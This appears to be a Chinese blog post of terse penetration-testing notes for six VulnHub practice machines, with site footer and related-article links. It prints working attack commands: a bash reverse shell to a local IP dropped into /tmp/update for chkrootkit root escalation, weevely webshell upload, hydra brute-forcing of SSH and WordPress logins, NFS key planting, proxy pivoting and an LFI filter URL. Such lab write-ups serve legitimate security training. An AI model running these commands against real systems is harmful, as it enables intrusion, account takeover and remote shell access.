vulnhub 3

最新推荐文章于 2022-04-18 19:00:00 发布
最新推荐文章于 2022-04-18 19:00:00 发布
阅读量616 收藏 1
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/113476242
版权

目录

sickos-12,144

1.端口扫描

​2.查看web服务

3.利用Put上传webshell

​4.查看计划任务

​5.利用exp提权

hacklab-vulnix,48

1.端口扫描

​2.使用smtp-user-enum  爆破用户名

​3.对nfs的渗透

​4.使用vulnix账号登录ssh

5.提权

pwnos-20-pre-release,34

1.端口扫描

​2.爆破web目录,查看info.php,/blog页面

3.上传shell

4.查看mysql配置文件

skytower-1,96

1.端口扫描

​2.查看web页面,登录页面存在sql注入

3.登录ssh

​4.查看数据库文件

​5.ssh登录sara账号

mr-robot-1,151

1.端口扫描

​2.使用gobuster扫描网站并查看robots

​3.登录wordpress上传shell

​4.nmap提权

pwnlab-init,158

1.端口扫描

​2.web服务存在本地文件包含,

​3.连接mysql

​4.登录web,上传图片马

​访问index.php,将图片路径加入cookie进行访问,反弹shell

​5.测试三个用户,并提权

sickos-12,144

1.端口扫描

2.查看web服务

访问url下的test目录,该网站为lighttpd/1.4.28,寻找exp未发现适合版本

使用curl查看是否存在PUT上传漏洞

curl -vvv -X OPTIONS http://192.168.43.169/test/

3.利用Put上传webshell

weevely generate aa ./te.php
weevely http://192.168.43.169/test/te.php aa

4.查看计划任务

ls -la /etc/cron.daily
chkrootkit -V

5.利用exp提权

靶机的Chkrootkit会周期性以root身份执行目录/tmp/update的文件,如果没有这个文件就创建

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.43.2/8080 0>&1\n' > /tmp/update
cd /tmp
chmod +x update
ls -la

 

 

 

hacklab-vulnix,48

1.端口扫描

 

2.使用smtp-user-enum  爆破用户名

./smtp-user-enum.pl -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.43.36

 

finger user@192.168.43.36    #使用finger测试用户名是否存在
hydra -l user -P rockyou.txt 192.168.43.36 ssh -t 4

 

3.对nfs的渗透

 

mkdir /tmp/nfs
showmount -e 192.168.43.36    
mount -t nfs 192.168.43.36:/home/vulnix /tmp/nfs     #挂载到本地

创建账号

kali:
useradd -u 2008 vulnix
su vulnix 
$ mkdir .ssh
$ cd .ssh
$ echo ssh-rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/eRJKDUONqQ0pLo24lhyZZ9F5/FN1k8bps96SiVaf9QsqOSlWd2xcLpqVWjm6G0yioHptFZJ1E/yRb267JdJLWesortSD9ZKrNJv2/yJElKT2NT+oR9S5ZzVEIZuVsIVOzGJEZsr6IJVOVX2se9WixA+nT5YhH5yt5fLz8Aygneej7iUx/OcgQHrbkySzUBSFGdekj8so5NranSvHH+64esQEES+DpApkhYpNKDVbvuh5Tay4uGDZKP4i0O/hg4QJSmP6OUmj3AYxQGDxRpGiw1wzzz1ZauaavWbu9DFcmCI/GTVtpcmGuCFNSqhXj3OtoNnOZ0/zO8g+0tGkr/VrQWYCItY4Th3WNogizkpeVfma8qr2r9/u8CWsphdQxAjlGaA.. > authorized_keys    #将生成的公钥复制粘贴到此处

ssh-keygen 
cd /root/.ssh 
cat id_rsa.pub

 

4.使用vulnix账号登录ssh

 

将/etc/exports最后一行更改为如下内容。curl+^O保存

 

复制bash命令到当前目录 ,重启靶机。

重新挂载到本机,kali上切换至root用户进入挂载好的nfs目录,使用chown命令将其更改为root权限,然后再次退出使用用户vulnix登录进行执行提权

┌──(root💀kali)-[/tmp]
└─# mount -t nfs 192.168.43.36:/home/vulnix /tmp/nfs

└─# chown root.root /tmp/nfs/bash                                                                                                                                                       
                                                                                                                                                                                            
┌──(root💀kali)-[/tmp]
└─# ls -la /tmp/nfs

5.提权

 

 

pwnos-20-pre-release,34

 

1.端口扫描

 

2.爆破web目录,查看info.php,/blog页面

blog的源代码中显示sphpblog,msf中搜索sphp

exp未利用成功,创建了一个临时用户rSpyid,登录账号

3.上传shell

http://10.10.10.100/blog/upload_img.php登录账号发现有上传图片页面,上传php文件尝试。

访问上传文件并成功收到反弹shell

4.查看mysql配置文件

查看上级目录,发现一样的配置文件,使用其中的密码成功切换到root用户

 

 

 

skytower-1,96

1.端口扫描

 

2.查看web页面,登录页面存在sql注入

3.登录ssh

由于22端口被过滤,可以选择3128端口代理登录

proxytunnel -p 192.168.43.93:3128 -d 127.0.0.1:22 -a 8888 
ssh 127.0.0.1 -l john -p 8888


使用socat进行端口转发目标代理端口3128
socat TCP-LISTEN:8888,reuseaddr,fork PROXY:192.168.43.93:127.0.0.1:22,proxyport=3128
使用proxychains进行操作,配置成http代理

ssh 127.0.0.1 -l john -p 8888 mv .bashrc .bashrc.bak     #文件改名或者nc登录

无法进行sudo提权,查看其它用户和网站配置文件

 

4.查看数据库文件

5.ssh登录sara账号

sudo cat /accounts/../root/flag.txt    #访问绝对目录

 

mr-robot-1,151

1.端口扫描

2.使用gobuster扫描网站并查看robots

gobuster dir -u http://192.168.43.51 -w /usr/share/wordlists/dirbuster/directory-list


密码字典进去去重
wc -l fsocity.dic
sort -u fsocity.dic | wc -l
sort -u fsocity.dic > fsocity_sort.dic
先随便使用一个密码,然后使用上面的字典去尝试猜测用户名
hydra -L fsocity_sort.dic -p cdxf 192.168.43.51 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username" -t 50 -f -V

密码爆破

wpscan --url http://192.168.43.51 -U elliot -P /home/kali/13/fsocity.sort.dic

hydra -vV -l elliot -P fsocity_sort.dic 192.168.43.51 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect"

 

3.登录wordpress上传shell

查看家目录下的用户及文件,发现robot的md5密码,切换至robot

横向移动到另一个用户之后看能不能使用sudo提权,或者被赋予了setuid的权限文件进行提权,使用find命令查找
ls -alt `find / -perm -4000 -type f 2>/dev/null`

4.nmap提权

进入Nmap命令行模式,成功查看到flag

 

 

pwnlab-init,158

1.端口扫描

2.web服务存在本地文件包含,

参考链接https://github.com/SewellDinG/LFIboomCTF

http://192.168.43.80/?page=php://filter/convert.base64-encode/resource=config                    base64解码

3.连接mysql

 

4.登录web,上传图片马

访问index.php,将图片路径加入cookie进行访问,反弹shell

5.测试三个用户,并提权

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

kongytr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Masashi: 1 vulnhub walkthrough
xdeclearn的博客
12-02 306
Masashi: 1 虚拟机信息:http://www.vulnhub.com/entry/masashi-1,599/ 0x01. 信息收集获取shell PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) tcp端口只开放了22和80,访问80为apache
Vulnhub-靶机-HackLAB: Vulnix
qq_43264813的博客
03-05 1074
Vulnhub—靶机—HackLAB: Vulnix 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/ 文章目录Vulnhub—靶机—HackLAB: Vulnix一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并对目标靶机进行全端口扫描: 【命令】nmap -n -sV -p- 192.168
No.21-VulnHub-HackLAB:Vulnix-Walkthrough渗透学习
qq_34801745的博客
01-18 1301
** VulnHub-HackLAB:Vulnix-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/ 靶机难度:初级(CTF) 靶机发布日期:2012年9月10日 靶机描述:在这里,我们有一台易受攻击的Linux主机,该主机具有配置缺陷,而不是有目的的易受攻击的软件版本(无论如何,在发布之时就如此!) 目标:得...
Android官方建议关于Android APP UI界面设计的一些参考原则
一个IT人的技术成长历程。创造未来的行为就发生在今天,没有明天的目标,今天的行动就是重复昨天的事情。
01-16 1358
下面是来自于Android官网给出了关于Android APP UI界面设计的一些参考原则,希望对广大ui设计师能带来帮助,尤其是在进行Andriod相关界面设计的时候。   一、清晰是UI界面第一位,也是最重要的目标。   只有清楚的知道你设计的UI界面是什么,明白为什么要用它,理解界面是如何帮助他们交互的,预测用它会发生什么。人们才可能高效的利用它。模糊和迷惑的UI界面使得用户连疑问的...
靶机渗透练习39-SickOs2
hirak0的博客
04-18 849
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ Description About Release Name........: SickOs1.2 Date Release: 26 Apr 2016 Author......: D4rk Series......: SickOs Objective...: Get /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt Tester(s)...: h1tch1, E
vulnhub2
willow_liang的博客
01-30 175
目录 fristileaks-13,133 1.查找靶机ip 2.端口扫描 3.查看web界面 4.上传一个rever.php.gif的shell,nc进行监听。 5.登录admin账号 6.提权 stapler-1,150 1.端口扫描 2.尝试登录ftp,ftp允许匿名登录,下载note文件,发现两个用户名elly和john 3.访问12380的web服务 4.使用wpscan扫描 5.使用该exp查找wordpress的配置文件 6.登录phpmyadmin 使用j.
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
VulnHub
02-10
3. 02: 这可能是月份,暗示这个机器在二月发布。 4. NOM: 可能代表机器的名称,但具体名称没有给出,通常VulnHub的靶机会有描述性的名字,帮助用户了解其特点和难度。 5. 尼维奥: 这可能是机器的名称或者是某个特定...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub-djinn3
KAKA的博客
07-18 1114
与 1 和 2 相同,开机即可得到 djinn3 的 IP地址:192.168.67.14 获取相关信息:nmap -A -p- 192.168.67.14 22 ---> ssh --> open 80 ---> http --> open 5000 ---> http --> open 31337 ---> open --> open 探测 80 端口 先看看刚刚 nmap 有没有扫出什么东西: 可得到服务端是 lighttp.
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 431
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
开源网页服务器Lighttpd再爆漏洞 影响所有版本
weixin_30326515的博客
12-01 1128
lighttpd(发音为lighty)是一套开放源代码的网页服务器,以BSD许可证发布。相较于其他的网页服务器,lighttpd仅需少量的存储器及CPU资源即可达到同样的性能。今天lighttpd 团队对外发布公告,包括最新版本1.4.29在内的所有版本存在通过mod_auth 模块在base64加密字符的时候会出现符号错误导致的越界漏洞。 具体信息参见:http://download.ligh...
No.50-VulnHub-hackNos: Os-hackNos-3-Walkthrough渗透学习
qq_34801745的博客
02-09 724
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年12月14日 靶机描述: Difficulty: Intermediate Flag: 2 Flag first user A...
小白的靶机VulnHub-pWnOS
wo41ge的博客
01-19 240
靶机地址:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 这个靶机有点特殊 靶机默认设置: IP: 10.10.10.100 Netmask: 255.255.255.0 Gateway: 10.10.10.15 所以攻击机需要在10.10.10.0/24网段 所以新添加一个网段 将攻击机(KALI)和靶机 网络适配器都选到这个模式 靶机IP是固定的:10.10.10.100 开放了 22 和 80端口 上网页康康 ...
vulnhub--shenron: 3
venu_s的博客
08-12 417
靶机介绍 Goal: Get two flags Difficult: Beginner Download:https://www.vulnhub.com/entry/shenron-3,682/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.176 目录扫描 gobuster dir -u http://192.168.187.176 -x "php,txt,zip,b
物联网工程_基于RFID的食堂食品安全监测系统设计.docx
最新发布
07-20
物联网工程_基于RFID的食堂食品安全监测系统设计
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经获得sar靶机的访问权限,你可以使用http://192.168.169.142/index.php?plot=;cat /etc/passwd这个URL来尝试执行命令,其中cat /etc/passwd是一个示例命令,用于显示系统中的用户列表。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值